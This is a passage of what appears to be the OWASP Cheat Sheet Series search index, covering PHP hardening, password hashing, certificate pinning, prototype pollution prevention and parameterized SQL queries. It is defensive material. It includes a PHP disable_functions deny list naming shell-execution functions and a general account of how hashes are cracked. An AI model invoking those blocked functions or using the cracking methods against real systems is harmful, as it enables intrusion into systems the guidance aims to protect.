enable_dl\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\ndisable_functions\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0system,\u00a0exec,\u00a0shell_exec,\u00a0passthru,\u00a0phpinfo,\u00a0show_source,\u00a0highlight_file, popen,\u00a0proc_open, fopen_with_path,\u00a0dbmopen,\u00a0dbase_open,\u00a0putenv,\u00a0move_uploaded_file, chdir,\u00a0mkdir,\u00a0rmdir,\u00a0chmod,\u00a0rename, filepro,\u00a0filepro_rowcount,\u00a0filepro_retrieve,\u00a0posix_mkfifo\n#\u00a0see\u00a0also:\u00a0http://ir.php.net/features.safe-mode\ndisable_classes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\n

These are dangerous PHP functions. You should disable all that you don't use.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-session-handling","title":"PHP session handling","text":"

Session settings are some of the MOST important values to concentrate on in configuring. It is a good practice to change session.name to something new.

 session.save_path                = /path/PHP-session/\n session.name                     = myPHPSESSID\n session.auto_start               = Off\n session.use_trans_sid            = 0\n session.cookie_domain            = full.qualified.domain.name\n #session.cookie_path             = /application/path/\n session.use_strict_mode          = 1\n session.use_cookies              = 1\n session.use_only_cookies         = 1\n session.cookie_lifetime          = 14400 # 4 hours\n session.cookie_secure            = 1\n session.cookie_httponly          = 1\n session.cookie_samesite          = Strict\n session.cache_expire             = 30\n session.sid_length               = 256\n session.sid_bits_per_character   = 6 # PHP 7.2+\n session.hash_function\u00a0\u00a0\u00a0         =\u00a01 # PHP 7.0-7.1\n session.hash_bits_per_character\u00a0 =\u00a06 # PHP 7.0-7.1\n
"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#some-more-security-paranoid-checks","title":"Some more security paranoid checks","text":"
session.referer_check\u00a0\u00a0\u00a0=\u00a0/application/path\nmemory_limit\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a050M\npost_max_size\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a020M\nmax_execution_time\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a060\nreport_memleaks\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0On\ntrack_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nhtml_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\n
"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#suhosin","title":"Suhosin","text":"

Suhosin is a patch to PHP which provides a number of hardening and security features that are not available in the default PHP build. However, Suhosin only works with PHP 5, which is unsupported and should not be used.

For PHP 7, there is Suhosin-ng, but it's in a prerelease stage, and as such should not be used in production.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#snuffleupagus","title":"Snuffleupagus","text":"

Snuffleupagus is the spiritual descendent of Suhosin for PHP 7 and onwards, with modern features. It's considered stable, and is usable in production.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html","title":"Password Storage Cheat Sheet","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#introduction","title":"Introduction","text":"

It is essential to store passwords in a way that prevents them from being obtained by an attacker even if the application or database is compromised. The majority of modern languages and frameworks provide built-in functionality to help store passwords safely.

After an attacker has acquired stored password hashes, they are always able to brute force hashes offline. As a defender, it is only possible to slow down offline attacks by selecting hash algorithms that are as resource intensive as possible.

This cheat sheet provides guidance on the various areas that need to be considered related to storing passwords. In short:

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#background","title":"Background","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#hashing-vs-encryption","title":"Hashing vs Encryption","text":"

Hashing and encryption both provide ways to keep sensitive data safe. However, in almost all circumstances, passwords should be hashed, NOT encrypted.

Hashing is a one-way function (i.e., it is impossible to \"decrypt\" a hash and obtain the original plaintext value). Hashing is appropriate for password validation. Even if an attacker obtains the hashed password, they cannot enter it into an application's password field and log in as the victim.

Encryption is a two-way function, meaning that the original plaintext can be retrieved. Encryption is appropriate for storing data such as a user's address since this data is displayed in plaintext on the user's profile. Hashing their address would result in a garbled mess.

In the context of password storage, encryption should only be used in edge cases where it is necessary to obtain the original plaintext password. This might be necessary if the application needs to use the password to authenticate with another system that does not support a modern way to programmatically grant access, such as OpenID Connect (OIDC). Where possible, an alternative architecture should be used to avoid the need to store passwords in an encrypted form.

For further guidance on encryption, see the Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#how-attackers-crack-password-hashes","title":"How Attackers Crack Password Hashes","text":"

Although it is not possible to \"decrypt\" password hashes to obtain the original passwords, it is possible to \"crack\" the hashes in some circumstances.

The basic steps are:

This process is repeated for a large number of potential candidate passwords. Different methods can be used to select candidate passwords, including:

While the number of permutations can be enormous, with high speed hardware (such as GPUs) and cloud services with many servers for rent, the cost to an attacker is relatively small to do successful password cracking especially when best practices for hashing are not followed.

Strong passwords stored with modern hashing algorithms and using hashing best practices should be effectively impossible for an attacker to crack. It is your responsibility as an application owner to select a modern hashing algorithm.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#password-storage-concepts","title":"Password Storage Concepts","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#salting","title":"Salting","text":"

A salt is a unique, randomly generated string that is added to each password as part of the hashing process. As the salt is unique for every user, an attacker has to crack hashes one at a time using the respective salt rather than calculating a hash once and comparing it against every stored hash. This makes cracking large numbers of hashes significantly harder, as the time required grows in direct proportion to the number of hashes.

Salting also protects against an attacker pre-computing hashes using rainbow tables or database-based lookups. Finally, salting means that it is impossible to determine whether two users have the same password without cracking the hashes, as the different salts will result in different hashes even if the passwords are the same.

Modern hashing algorithms such as Argon2id, bcrypt, and PBKDF2 automatically salt the passwords, so no additional steps are required when using them.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#peppering","title":"Peppering","text":"

A pepper can be used in addition to salting to provide an additional layer of protection. The purpose of the pepper is to prevent an attacker from being able to crack any of the hashes if they only have access to the database, for example, if they have exploited a SQL injection vulnerability or obtained a backup of the database.

One of several peppering strategies is to hash the passwords as usual (using a password hashing algorithm) and then HMAC or encrypt the hashes with a symmetrical encryption key before storing the password hash in the database, with the key acting as the pepper. Peppering strategies do not affect the password hashing function in any way.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#work-factors","title":"Work Factors","text":"

The work factor is essentially the number of iterations of the hashing algorithm that are performed for each password (usually, it's actually 2^work iterations). The purpose of the work factor is to make calculating the hash more computationally expensive, which in turn reduces the speed and/or increases the cost for which an attacker can attempt to crack the password hash. The work factor is typically stored in the hash output.

When choosing a work factor, a balance needs to be struck between security and performance. Higher work factors will make the hashes more difficult for an attacker to crack but will also make the process of verifying a login attempt slower. If the work factor is too high, this may degrade the performance of the application and could also be used by an attacker to carry out a denial of service attack by making a large number of login attempts to exhaust the server's CPU.

There is no golden rule for the ideal work factor - it will depend on the performance of the server and the number of users on the application. Determining the optimal work factor will require experimentation on the specific server(s) used by the application. As a general rule, calculating a hash should take less than one second.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#upgrading-the-work-factor","title":"Upgrading the Work Factor","text":"

One key advantage of having a work factor is that it can be increased over time as hardware becomes more powerful and cheaper.

The most common approach to upgrading the work factor is to wait until the user next authenticates and then to re-hash their password with the new work factor. This means that different hashes will have different work factors and may result in hashes never being upgraded if the user doesn't log back into the application. Depending on the application, it may be appropriate to remove the older password hashes and require users to reset their passwords next time they need to login in order to avoid storing older and less secure hashes.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#password-hashing-algorithms","title":"Password Hashing Algorithms","text":"

There are a number of modern hashing algorithms that have been specifically designed for securely storing passwords. This means that they should be slow (unlike algorithms such as MD5 and SHA-1, which were designed to be fast), and how slow they are can be configured by changing the work factor.

Websites should not hide which password hashing algorithm they use. If you utilize a modern password hashing algorithm with proper configuration parameters, it should be safe to state in public which password hashing algorithms are in use and be listed here.

The main three algorithms that should be considered are listed below:

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#argon2id","title":"Argon2id","text":"

Argon2 is the winner of the 2015 Password Hashing Competition. There are three different versions of the algorithm, and the Argon2id variant should be used, as it provides a balanced approach to resisting both side-channel and GPU-based attacks.

Rather than a simple work factor like other algorithms, Argon2id has three different parameters that can be configured. Argon2id should use one of the following configuration settings as a base minimum which includes the minimum memory size (m), the minimum number of iterations (t) and the degree of parallelism (p).

These configuration settings are equivalent in the defense they provide. The only difference is a trade off between CPU and RAM usage.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#scrypt","title":"scrypt","text":"

scrypt is a password-based key derivation function created by Colin Percival. While Argon2id should be the best choice for password hashing, scrypt should be used when the former is not available.

Like Argon2id, scrypt has three different parameters that can be configured. scrypt should use one of the following configuration settings as a base minimum which includes the minimum CPU/memory cost parameter (N), the blocksize (r) and the degree of parallelism (p).

These configuration settings are equivalent in the defense they provide. The only difference is a trade off between CPU and RAM usage.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#bcrypt","title":"bcrypt","text":"

The bcrypt password hashing function should be the best choice for password storage in legacy systems or if PBKDF2 is required to achieve FIPS-140 compliance.

The work factor should be as large as verification server performance will allow, with a minimum of 10.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#input-limits","title":"Input Limits","text":"

bcrypt has a maximum length input length of 72 bytes for most implementations. To protect against this issue, a maximum password length of 72 bytes (or less if the implementation in use has smaller limits) should be enforced when using bcrypt.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pre-hashing-passwords","title":"Pre-Hashing Passwords","text":"

An alternative approach is to pre-hash the user-supplied password with a fast algorithm such as SHA-256, and then to hash the resulting hash with bcrypt (i.e., bcrypt(base64(hmac-sha256(data:$password, key:$pepper)), $salt, $cost)). This is a dangerous (but common) practice that should be avoided due to password shucking and other issues when combining bcrypt with other hash functions.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2","title":"PBKDF2","text":"

PBKDF2 is recommended by NIST and has FIPS-140 validated implementations. So, it should be the preferred algorithm when these are required.

PBKDF2 requires that you select an internal hashing algorithm such as an HMAC or a variety of other hashing algorithms. HMAC-SHA-256 is widely supported and is recommended by NIST.

The work factor for PBKDF2 is implemented through an iteration count, which should set differently based on the internal hashing algorithm used.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#parallel-pbkdf2","title":"Parallel PBKDF2","text":"

These configuration settings are equivalent in the defense they provide. (Number as of december 2022, based on testing of RTX 4000 GPUs)

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2-pre-hashing","title":"PBKDF2 Pre-hashing","text":"

When PBKDF2 is used with an HMAC, and the password is longer than the hash function's block size (64 bytes for SHA-256), the password will be automatically pre-hashed. For example, the password \"This is a password longer than 512 bits which is the block size of SHA-256\" is converted to the hash value (in hex): fa91498c139805af73f7ba275cca071e78d78675027000c99a9925e2ec92eedd.

A good implementation of PBKDF2 will perform pre-hashing before the expensive iterated hashing phase, but some implementations perform the conversion on each iteration. This can make hashing long passwords significantly more expensive than hashing short passwords. If a user can supply very long passwords, there is a potential denial of service vulnerability, such as the one published in Django in 2013. Manual pre-hashing can reduce this risk but requires adding a salt to the pre-hash step.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#upgrading-legacy-hashes","title":"Upgrading Legacy Hashes","text":"

For older applications built using less secure hashing algorithms such as MD5 or SHA-1, these hashes should be upgraded to modern password hashing algorithms as described above. When the user next enters their password (usually by authenticating on the application), it should be re-hashed using the new algorithm. It would also be good practice to expire the users' current password and require them to enter a new one so that any older (less secure) hashes of their password are no longer useful to an attacker.

However, this approach means that old (less secure) password hashes will be stored in the database until the user logs in. Two main approaches can be taken to avoid this dilemma.

One method is to expire and delete the password hashes of users who have been inactive for an extended period and require them to reset their passwords to login again. Although secure, this approach is not particularly user-friendly. Expiring the passwords of many users may cause issues for support staff or may be interpreted by users as an indication of a breach.

An alternative approach is to use the existing password hashes as inputs for a more secure algorithm. For example, if the application originally stored passwords as md5($password), this could be easily upgraded to bcrypt(md5($password)). Layering the hashes avoids the need to know the original password; however, it can make the hashes easier to crack. These hashes should be replaced with direct hashes of the users' passwords next time the user logs in.

Assume that whatever password hashing method is selected will have to be upgraded in the future. Ensure that upgrading your hashing algorithm is as easy as possible. For a transition period, allow for a mix of old and new hashing algorithms. Using a mix of hashing algorithms is easier if the password hashing algorithm and work factor are stored with the password using a standard format, for example, the modular PHC string format.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#international-characters","title":"International Characters","text":"

Ensure your hashing library is able to accept a wide range of characters and is compatible with all Unicode codepoints. Users should be able to use the full range of characters available on modern devices, in particular mobile keyboards. They should be able to select passwords from various languages and include pictograms. Prior to hashing the entropy of the user's entry should not be reduced. Password hashing libraries need to be able to use input that may contain a NULL byte.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html","title":"Pinning Cheat Sheet","text":""},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Pinning Cheat Sheet is a technical guide to implementing certificate and public key pinning as discussed at the Virginia chapter's presentation Securing Wireless Channels in the Mobile Space. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#whats-the-problem","title":"What's the problem","text":"

Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#what-is-pinning","title":"What Is Pinning","text":"

Pinning is the process of associating a host with their expected X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host. If more than one certificate or public key is acceptable, then the program holds a pinset (taking from Jon Larimer and Kenny Root Google I/O talk). In this case, the advertised identity must match one of the elements in the pinset.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-to-add-a-pin","title":"When to Add a Pin","text":"

A host or service's certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former - adding at development time - is preferred since preloading the certificate or public key out of band usually means the attacker cannot taint the pin.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-do-you-perform-pinning","title":"When Do You Perform Pinning","text":"

You should pin anytime you want to be relatively certain of the remote host's identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-do-you-not-pin","title":"When Do You Not Pin?","text":"

Pinning requires control of upcoming certificate attributes. If the certificate key pair cannot be predicted in advance before it is put into service, then pinning will lead to an outage when the endpoint presents a new certificate. For instance, if a certificate provider generates random key pairs whenever a certificate is rotated, and you cannot control when this certificate is put into use, then you will not be able to update your clients until they have already experienced an outage.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-to-apply-exceptions","title":"When to Apply Exceptions","text":"

If you are working for an organization which practices \"egress filtering\" as part of a Data Loss Prevention (DLP) strategy, you will likely encounter Interception Proxies. I like to refer to these things as \"good\" bad actors (as opposed to \"bad\" bad actors) since both break end-to-end security and we can't tell them apart. In this case, do not offer to allow-list the interception proxy since it defeats your security goals. Add the interception proxy's public key to your pinset after being instructed to do so by the folks in Risk Acceptance.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#how-do-you-pin","title":"How Do You Pin","text":"

The idea is to re-use the exiting protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.

To harden the channel, the program would take advantage of the OnConnect callback offered by a library, framework or platform. In the callback, the program would verify the remote host's identity by validating its certificate or public key. See some examples below.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#what-should-be-pinned","title":"What Should Be Pinned","text":"

In order to decide what should be pinned you can follow the following steps.

  1. Decide if you want to pin the root CA, intermediate CA or leaf certificate:

    For example, the application pins the remote endpoint leaf certificate but includes a backup pin for the intermediate CA. This increases the risk by trusting more certificate authorities but decreases the chances of bricking your app. If there's any issue with the leaf certificate, the app can always fall back to the intermediate CA until you release an app update.

  2. Choose if you want to pin the whole certificate or just its public key.

  3. If you chose the public key, you have two additional choices:

  4. Pin the subjectPublicKeyInfo.

  5. Pin one of the concrete types such as RSAPublicKey or DSAPublicKey.

subjectPublicKeyInfo:

The three choices are explained below in more detail. I would encourage you to pin the subjectPublicKeyInfo because it has the public parameters (such as {e,n} for an RSA public key) and contextual information such as an algorithm and OID. The context will help you keep your bearings at times, and the figure to the right shows the additional information available.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#certificate","title":"Certificate","text":"

The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use openssl s_client to retrieve the certificate etc. At runtime, you retrieve the website or server's certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#public-key","title":"Public Key","text":"

Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key with its embedded copy of the public key.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#hash","title":"Hash","text":"

While the three choices above used DER encoding, its also acceptable to use a hash of the information. In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like dumpasn1 and other ASN.1 decoders.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#examples-of-pinning","title":"Examples of Pinning","text":"

This section discusses certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. Code has been omitted for brevity, but the key points for the platform are highlighted.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#android","title":"Android","text":"

Since Android N, the preferred way for implementing pinning is by leveraging Android's Network Security Configuration feature, which lets apps customize their network security settings in a safe, declarative configuration file without modifying app code.

To enable pinning, the <pin-set> configuration setting can be used.

If devices running a version of Android that is earlier than N need to be supported, a backport of the Network Security Configuration pinning functionality is available via the TrustKit Android library.

Alternatively you can use methods such as the pinning from OkHTTP in order to set specific pins programmatically, as explained in the OWASP Mobile Security Testing Guide (MSTG) and the OKHttp documentation.

The Android documentation provides an example of how SSL validation can be customized within the app's code (in order to implement pinning) in the Unknown CA implementation document. However, implementing pinning validation from scratch should be avoided, as implementation mistakes are extremely likely and usually lead to severe vulnerabilities.

Lastly, if you want to validate whether the pinning is successful, please follow instructions from the introduction into testing network communication and the Android specific network testing chapters of the OWASP Mobile Security Testing Guide (MSTG).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#ios","title":"iOS","text":"

Apple suggests pinning a CA public key by specifying it in Info.plist file under App Transport Security Settings. More details in the article \"Identity Pinning: How to configure server certificates for your app\".

TrustKit, an open-source SSL pinning library for iOS and macOS is available. It provides an easy-to-use API for implementing pinning, and has been deployed in many apps.

Otherwise, more details regarding how SSL validation can be customized on iOS (in order to implement pinning) are available in the HTTPS Server Trust Evaluation technical note. However, implementing pinning validation from scratch should be avoided, as implementation mistakes are extremely likely and usually lead to severe vulnerabilities.

Lastly, if you want to validate whether the pinning is successful, please follow instructions from the introduction into testing network communication and the iOS specific network testing chapters of the OWASP Mobile Security Testing Guide (MSTG).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#net","title":".Net","text":"

.Net pinning can be achieved by using ServicePointManager. An example can be found at the OWASP MSTG.

Download the .Net sample program.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#openssl","title":"OpenSSL","text":"

Pinning can occur at one of two places with OpenSSL. First is the user supplied verify_callback. Second is after the connection is established via SSL_get_peer_certificate. Either method will allow you to access the peer's certificate.

Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in X509_V_OK with a NULL certificate. To check the result of the customary verification:

  1. You must call SSL_get_verify_result and verify the return code is X509_V_OK;
  2. You must call SSL_get_peer_certificate and verify the certificate is non-NULL.

Download: OpenSSL sample program.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#electron","title":"Electron","text":"

electron-ssl-pinning, an open-source SSL pinning library for Electron based applications. It provides an easy-to-use API for implementing pinning and also provides tool for fetching configuration based on needed hosts.

Otherwise, you can validate certificates by yourself using ses.setCertificateVerifyProc(proc).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html","title":"Prototype Pollution Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#explanation","title":"Explanation","text":"

Prototype Pollution is a critical vulnerability that can allow attackers to manipulate an application's JavaScript objects and properties, leading to serious security issues such as unauthorized access to data, privilege escalation, and even remote code execution.

For examples of why this is dangerous, see the links in the Other resources section below.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#suggested-protection-mechanisms","title":"Suggested protection mechanisms","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-new-set-or-new-map","title":"Use \"new Set()\" or \"new Map()\"","text":"

Developers should use new Set() or new Map() instead of using object literals:

let allowedTags = new Set();\nallowedTags.add('b');\nif(allowedTags.has('b')){\n//...\n}\n\nlet options = new Map();\noptions.set('spaces', 1);\nlet spaces = options.get('spaces')\n
"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#if-objects-or-object-literals-are-required","title":"If objects or object literals are required","text":"

If objects have to be used then they should be created using the Object.create(null) API to ensure they don't inherit from the Object prototype:

let obj = Object.create(null);\n

If object literals are required then as a last resort you could use the __proto__ property:

let obj = {__proto__:null};\n
"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-object-freeze-and-seal-mechanisms","title":"Use object \"freeze\" and \"seal\" mechanisms","text":"

You can also use the Object.freeze() and Object.seal() APIs to prevent built-in prototypes from being modified however this can break the application if the libraries they use modify the built-in prototypes.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#nodejs-configuration-flag","title":"Node.js configuration flag","text":"

Node.js also offers the ability to remove the __proto__ property completely using the --disable-proto=delete flag. Note this is a defense in depth measure.

Prototype pollution is still possible using constructor.prototype properties but removing __proto__ helps reduce attack surface and prevent certain attacks.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#other-resources","title":"Other resources","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#credits","title":"Credits","text":"

Credit to Gareth Hayes for providing the original protection guidance in this comment.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html","title":"Query Parameterization Cheat Sheet","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

SQL Injection is one of the most dangerous web vulnerabilities. So much so that it was the #1 item in both the OWASP Top 10 2013 version, and 2017 version. As of 2021, it sits at #3 on the OWASP Top 10.

It represents a serious threat because SQL Injection allows evil attacker code to change the structure of a web application's SQL statement in a way that can steal data, modify data, or potentially facilitate command injection to the underlying OS.

This cheat sheet is a derivative work of the SQL Injection Prevention Cheat Sheet.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#parameterized-query-examples","title":"Parameterized Query Examples","text":"

SQL Injection is best prevented through the use of parameterized queries. The following chart demonstrates, with real-world code samples, how to build parameterized queries in most of the common web languages. The purpose of these code samples is to demonstrate to the web developer how to avoid SQL Injection when building database queries within a web application.

Please note, many client side frameworks and libraries offer client side query parameterization. These libraries often just build queries with string concatenation before sending raw queries to a server. Please ensure that query parameterization is done server-side!

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#prepared-statement-examples","title":"Prepared Statement Examples","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-java-built-in-feature","title":"Using Java built-in feature","text":"
String custname = request.getParameter(\"customerName\");\nString query = \"SELECT account_balance FROM user_data WHERE user_name = ? \";  PreparedStatement pstmt = connection.prepareStatement( query );\npstmt.setString( 1, custname);\nResultSet results = pstmt.executeQuery( );\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-java-with-hibernate","title":"Using Java with Hibernate","text":"
// HQL\n@Entity // declare as entity;\n@NamedQuery(\nname=\"findByDescription\",\nquery=\"FROM Inventory i WHERE i.productDescription = :productDescription\"\n)\npublic class Inventory implements Serializable {\n@Id\nprivate long id;\nprivate String productDescription;\n}\n\n// Use case\n// This should REALLY be validated too\nString userSuppliedParameter = request.getParameter(\"Product-Description\");\n// Perform input validation to detect attacks\nList<Inventory> list =\nsession.getNamedQuery(\"findByDescription\")\n.setParameter(\"productDescription\", userSuppliedParameter).list();\n\n// Criteria API\n// This should REALLY be validated too\nString userSuppliedParameter = request.getParameter(\"Product-Description\");\n// Perform input validation to detect attacks\nInventory inv = (Inventory) session.createCriteria(Inventory.class).add\n(Restrictions.eq(\"productDescription\", userSuppliedParameter)).uniqueResult();\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-net-built-in-feature","title":"Using .NET built-in feature","text":"
String query = \"SELECT account_balance FROM user_data WHERE user_name = ?\";\ntry {\nOleDbCommand command = new OleDbCommand(query, connection);\ncommand.Parameters.Add(new OleDbParameter(\"customerName\", CustomerName Name.Text));\nOleDbDataReader reader = command.ExecuteReader();\n// \u2026\n} catch (OleDbException se) {\n// error handling\n}\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-asp-net-built-in-feature","title":"Using ASP .NET built-in feature","text":"
string sql = \"SELECT * FROM Customers WHERE CustomerId = @CustomerId\";\nSqlCommand command = new SqlCommand(sql);\ncommand.Parameters.Add(new SqlParameter(\"@CustomerId\", System.Data.SqlDbType.Int));\ncommand.Parameters[\"@CustomerId\"].Value = 1;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-ruby-with-activerecord","title":"Using Ruby with ActiveRecord","text":"
## Create\nProject.create!(:name => 'owasp')\n## Read\nProject.all(:conditions => \"name = ?\", name)\nProject.all(:conditions => { :name => name })\nProject.where(\"name = :name\", :name => name)\n## Update\nproject.update_attributes(:name => 'owasp')\n## Delete\nProject.delete(:name => 'name')\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-ruby-built-in-feature","title":"Using Ruby built-in feature","text":"
insert_new_user = db.prepare \"INSERT INTO users (name, age, gender) VALUES (?, ? ,?)\"\ninsert_new_user.execute 'aizatto', '20', 'male'\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-php-with-php-data-objects","title":"Using PHP with PHP Data Objects","text":"
$stmt = $dbh->prepare(\"INSERT INTO REGISTRY (name, value) VALUES (:name, :value)\");\n$stmt->bindParam(':name', $name);\n$stmt->bindParam(':value', $value);\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-cold-fusion-built-in-feature","title":"Using Cold Fusion built-in feature","text":"
<cfquery name = \"getFirst\" dataSource = \"cfsnippets\">\n    SELECT * FROM #strDatabasePrefix#_courses WHERE intCourseID =\n    <cfqueryparam value = #intCourseID# CFSQLType = \"CF_SQL_INTEGER\">\n</cfquery>\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-perl-with-database-independent-interface","title":"Using PERL with Database Independent Interface","text":"
my $sql = \"INSERT INTO foo (bar, baz) VALUES ( ?, ? )\";\nmy $sth = $dbh->prepare( $sql );\n$sth->execute( $bar, $baz );\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-rust-with-sqlx","title":"Using Rust with SQLx","text":"
// Input from CLI args but could be anything\nlet username = std::env::args().last().unwrap();\n\n// Using build-in macros (compile time checks)\nlet users = sqlx::query_as!(\nUser,\n\"SELECT * FROM users WHERE name = ?\",\nusername\n)\n.fetch_all(&pool)\n.await .unwrap();\n\n// Using built-in functions\nlet users: Vec<User> = sqlx::query_as::<_, User>(\n\"SELECT * FROM users WHERE name = ?\"\n)\n.bind(&username)\n.fetch_all(&pool)\n.await\n.unwrap();\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-examples","title":"Stored Procedure Examples","text":"

The SQL you write in your web application isn't the only place that SQL injection vulnerabilities can be introduced. If you are using Stored Procedures, and you are dynamically constructing SQL inside them, you can also introduce SQL injection vulnerabilities.

Dynamic SQL can be parameterized using bind variables, to ensure the dynamically constructed SQL is secure.

Here are some examples of using bind variables in stored procedures in different databases.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#oracle-using-plsql","title":"Oracle using PL/SQL","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#normal-stored-procedure","title":"Normal Stored Procedure","text":"

No dynamic SQL being created. Parameters passed in to stored procedures are naturally bound to their location within the query without anything special being required:

PROCEDURE SafeGetBalanceQuery(UserID varchar, Dept varchar) AS BEGIN\nSELECT balance FROM accounts_table WHERE user_ID = UserID AND department = Dept;\nEND;\n
